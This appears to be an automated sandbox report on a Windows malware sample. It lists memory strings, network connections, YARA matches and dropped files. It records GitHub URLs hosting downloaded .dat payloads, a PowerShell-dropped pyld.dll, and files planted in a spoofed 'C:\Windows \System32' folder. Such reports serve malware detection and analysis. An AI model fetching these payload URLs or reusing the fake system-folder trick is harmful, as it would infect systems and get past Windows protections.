Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: x590769.dat.13.dr String found in binary or memory: https://dns.google/resolve?name=
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027126437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmai
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datf
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datpt:
Source: powershell.exe, 00000003.00000002.2218673511.000002712595C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.dr String found in binary or memory: https://ipinfo.io/json
Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.dr String found in binary or memory: https://ipinfo.io/jsonhardware_manager::download_json_error:
Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/
Source: svchost.exe, 0000001C.00000002.3269141211.000001D8E78F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat
Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3267873513.00000000660F4000.00000008.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000001C.00000002.3269701868.00007FF8A7ECE000.00000002.00000001.01000000.00000010.sdmp, libssl-3-x64.dll.13.dr String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 28_2_00007FF8B8372B80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 34_2_00007FF8B8372B80

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E38 NtClose, 0_2_00007FF7DF113E38
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E44 NtCreateUserProcess, 0_2_00007FF7DF113E44
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E5C NtDelayExecution, 0_2_00007FF7DF113E5C
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E68 NtQuerySystemInformation, 0_2_00007FF7DF113E68
Creates files inside the system directory
Source: C:\Windows\System32\cmd.exe File created: C:\Windows Jump to behavior
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32 Jump to behavior
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvcldr64.dat Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to behavior
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x590769.dat Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_xdtyzoyv.xau.ps1 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111ECC 0_2_00007FF7DF111ECC
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111B11 0_2_00007FF7DF111B11
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E10E0 10_2_00007FF67A0E10E0
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E10E0 13_2_00007FF67A0E10E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600A230 28_2_6600A230
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66010760 28_2_66010760
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66009810 28_2_66009810
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600BC90 28_2_6600BC90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660050A0 28_2_660050A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66019CB0 28_2_66019CB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600ACD0 28_2_6600ACD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_66004CE0 28_2_66004CE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600DD20 28_2_6600DD20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600CD60 28_2_6600CD60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600E580 28_2_6600E580
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6600D5A0 28_2_6600D5A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660121B0 28_2_660121B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828A0B0 28_2_6828A0B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828C220 28_2_6828C220
Source: C:\Windows\System32\svchost.exe Code function: 28_2_68281C10 28_2_68281C10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_68283500 28_2_68283500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682926C1 28_2_682926C1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FC1008 28_2_00007FF8A7FC1008
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0AD30 28_2_00007FF8A7F0AD30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F04C8C 28_2_00007FF8A7F04C8C
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FAE9C4 28_2_00007FF8A7FAE9C4
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F02900 28_2_00007FF8A7F02900
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F043B1 28_2_00007FF8A7F043B1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F89A90 28_2_00007FF8A7F89A90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FC0AB0 28_2_00007FF8A7FC0AB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F03B00 28_2_00007FF8A7F03B00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0E340 28_2_00007FF8A7F0E340
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0BCA9 28_2_00007FF8A7F0BCA9
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F0B4E0 28_2_00007FF8A7F0B4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9331310 28_2_00007FF8A9331310
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FCA90 28_2_00007FF8A92FCA90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93569E0 28_2_00007FF8A93569E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9344CC0 28_2_00007FF8A9344CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9334CD0 28_2_00007FF8A9334CD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9328B60 28_2_00007FF8A9328B60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933CB30 28_2_00007FF8A933CB30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E0EB0 28_2_00007FF8A92E0EB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931EDC0 28_2_00007FF8A931EDC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932F0F0 28_2_00007FF8A932F0F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93470A0 28_2_00007FF8A93470A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9332FA0 28_2_00007FF8A9332FA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930C240 28_2_00007FF8A930C240
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2210 28_2_00007FF8A92D2210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C210 28_2_00007FF8A931C210
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933A2E0 28_2_00007FF8A933A2E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C280 28_2_00007FF8A935C280
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F22E0 28_2_00007FF8A92F22E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933E4E0 28_2_00007FF8A933E4E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9318350 28_2_00007FF8A9318350
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC610 28_2_00007FF8A92EC610
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933A6B0 28_2_00007FF8A933A6B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340550 28_2_00007FF8A9340550
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9330590 28_2_00007FF8A9330590
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C700 28_2_00007FF8A931C700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932DAD0 28_2_00007FF8A932DAD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EB950 28_2_00007FF8A92EB950
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9359C40 28_2_00007FF8A9359C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9335C20 28_2_00007FF8A9335C20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D3C40 28_2_00007FF8A92D3C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CC1 28_2_00007FF8A9349CC1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DFBB0 28_2_00007FF8A92DFBB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FDEA0 28_2_00007FF8A92FDEA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345E80 28_2_00007FF8A9345E80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9351D30 28_2_00007FF8A9351D30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DC030 28_2_00007FF8A92DC030
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9302020 28_2_00007FF8A9302020
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E0F0 28_2_00007FF8A932E0F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337FE0 28_2_00007FF8A9337FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932D260 28_2_00007FF8A932D260
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93592A0 28_2_00007FF8A93592A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F32C0 28_2_00007FF8A92F32C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7400 28_2_00007FF8A92D7400
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931F420 28_2_00007FF8A931F420
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93334C0 28_2_00007FF8A93334C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5380 28_2_00007FF8A92D5380
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93356E0 28_2_00007FF8A93356E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EB830 28_2_00007FF8A92EB830
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934985F 28_2_00007FF8A934985F
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93438C0 28_2_00007FF8A93438C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83849E0 28_2_00007FF8B83849E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839AA52 28_2_00007FF8B839AA52
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B6B50 28_2_00007FF8B83B6B50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839A4A4 28_2_00007FF8B839A4A4
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C04A6 28_2_00007FF8B83C04A6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B838BA40 28_2_00007FF8B838BA40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B2B60 28_2_00007FF8B83B2B60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 28_2_00007FF8B8372B80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8371C30 28_2_00007FF8B8371C30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8373D50 28_2_00007FF8B8373D50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACDD0 28_2_00007FF8B83ACDD0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B3D80 28_2_00007FF8B83B3D80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B839BE30 28_2_00007FF8B839BE30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFE30 28_2_00007FF8B83AFE30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83BCEC0 28_2_00007FF8B83BCEC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B837EFC0 28_2_00007FF8B837EFC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8373FE0 28_2_00007FF8B8373FE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B836F0C0 28_2_00007FF8B836F0C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83B00D0 28_2_00007FF8B83B00D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712AD10 34_2_00007FF74712AD10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471050D0 34_2_00007FF7471050D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471180A0 34_2_00007FF7471180A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471488A8 34_2_00007FF7471488A8
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747139F50 34_2_00007FF747139F50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747129730 34_2_00007FF747129730
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102F90 34_2_00007FF747102F90
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74714CF64 34_2_00007FF74714CF64
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471357C0 34_2_00007FF7471357C0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152000 34_2_00007FF747152000
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471267F0 34_2_00007FF7471267F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747146650 34_2_00007FF747146650
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74711DE20 34_2_00007FF74711DE20
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747129E69 34_2_00007FF747129E69
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471176D0 34_2_00007FF7471176D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471486A4 34_2_00007FF7471486A4
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74711A6F0 34_2_00007FF74711A6F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117D60 34_2_00007FF747117D60
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712A5CA 34_2_00007FF74712A5CA
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC 34_2_00007FF74713C5DC
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471495E8 34_2_00007FF7471495E8
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715B484 34_2_00007FF74715B484
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152498 34_2_00007FF747152498
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715CCB4 34_2_00007FF74715CCB4
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747104370 34_2_00007FF747104370
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117380 34_2_00007FF747117380
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747112390 34_2_00007FF747112390
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF7471183E0 34_2_00007FF7471183E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747156240 34_2_00007FF747156240
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747117A20 34_2_00007FF747117A20
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747148AAC 34_2_00007FF747148AAC
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747152B10 34_2_00007FF747152B10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747115AE0 34_2_00007FF747115AE0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102180 34_2_00007FF747102180
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74715D20C 34_2_00007FF74715D20C
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74712A210 34_2_00007FF74712A210
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF747102A10 34_2_00007FF747102A10
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83849E0 34_2_00007FF8B83849E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B838BA40 34_2_00007FF8B838BA40
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839AA52 34_2_00007FF8B839AA52
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B6B50 34_2_00007FF8B83B6B50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B2B60 34_2_00007FF8B83B2B60
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8372B80 34_2_00007FF8B8372B80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8371C30 34_2_00007FF8B8371C30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8373D50 34_2_00007FF8B8373D50
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83ACDD0 34_2_00007FF8B83ACDD0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B3D80 34_2_00007FF8B83B3D80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839BE30 34_2_00007FF8B839BE30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83AFE30 34_2_00007FF8B83AFE30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83BCEC0 34_2_00007FF8B83BCEC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B837EFC0 34_2_00007FF8B837EFC0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8373FE0 34_2_00007FF8B8373FE0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B836F0C0 34_2_00007FF8B836F0C0
